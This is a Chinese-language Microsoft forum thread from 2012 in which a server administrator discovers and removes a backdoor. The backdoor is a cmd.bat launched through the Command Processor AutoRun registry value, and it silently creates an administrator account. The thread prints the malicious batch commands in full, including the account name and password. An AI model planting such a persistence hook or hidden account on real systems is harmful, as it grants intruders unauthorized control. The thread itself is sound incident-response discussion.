none
如何移除被植入,一打開命令提示字元及執行任何指令時就自動執行的code? RRS feed

  • 問題

  • 今天登入伺服器,打開命令提示字元時,發現開頭是這樣:

    ===================================
    帳戶已存在。

    詳細資料,請輸入 NET HELPMSG 2224。

    命令執行成功。

    Microsoft Windows [版本 5.2.3790]
    (C) 版權所有 1985-2003 Microsoft Corp。

    C:\Documents and Settings\Administrator>

    ===================================

    頓時心中警訊大響,趕緊跑去使用者管理那邊看,果然,多出一個使用者:IWAM_NETASPS。

    由於在命令提示字元中每次執行指令時均會出現該訊息,推斷被人植入了一段code,會新增帳號並將之加入Administrators群組,故我只能先停用此帳戶。

    請問各位前輩,要到哪裡移除該段code?小弟不知道要到哪裡去找... :(
    另外,要怎麼確保這種事不會再發生呢?小弟都是設定該伺服器會自動安裝更新檔,也沒有安裝任何來路不明的軟體。

    2012年3月30日 上午 04:46

所有回覆

  • 不曉得你的狀況是不是和這篇文章一樣。

    請檢查看看啟動中是否有asps.vbs,如果有的話把它刪除。

    http://social.technet.microsoft.com/Forums/en-US/ieitprocurrentver/thread/16763cb2-d64a-44b3-b72a-fb980dc6d94d


    以上說明若有錯誤請指教,謝謝。
    http://www.dotblogs.com.tw/terrychuang/

    2012年3月30日 上午 05:57
  • Hello Terry,

    謝謝您的回覆。 :)

    我有看過這篇文章,但情況稍有不同,我這邊的狀況是每次選執行,輸入cmd時,及之後在其中輸入任何指令時,該指令才會被執行。

    小弟已經掃過毒,經過防毒軟體掃過並清除了病毒後,狀況變為每次選執行,輸入cmd時,該指令才會被執行。之後在其中輸入任何指令時,不會再出現訊息。推測應該是執行了以下網址中步驟6的操作:
    http://www.troublefixers.com/computer-shutdown-restart-when-you-type-cmd-in-run-to-launch-command-prompt/

    也就是刪除 HKEY_CURRENT_USER\Software\Microsoft\Command Processor 及 HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor 下的autorun值。

    從同一篇文章中得到靈感,搜尋.bat檔,最後在C:\Documents and Settings\Administrator下發現cmd.bat,當中的指令如下:

    =========================================
    @echo off
    net user IWAM_NETASPS df;tjhn434 /add
    net localgroup Administrators IWAM_NETASPS /add
    cmd.exe

    =========================================

    現在疑惑的是此檔案是如何被植入的..... ^^;




    • 已標示為解答 Vinix 2012年3月30日 上午 08:22
    • 已編輯 Vinix 2012年3月30日 上午 08:29
    • 已取消標示為解答 Vinix 2012年3月30日 上午 08:32
    2012年3月30日 上午 07:44
  • 現在疑惑的是此檔案是如何被植入的..... ^^;

    看一下 cmd.bat 建立與修改的時間,回想那時候作了哪些操作

    若有開啟「稽核物件存取」的成功事件時,可以查看事件檢視器中,相關的記錄。



    ☞ 這裡是「免費的討論區」付費支援服務請造訪 此處享受尊榮服務
    如果回覆對您有幫助,請記得按下標示為解答」

    2012年3月31日 上午 04:55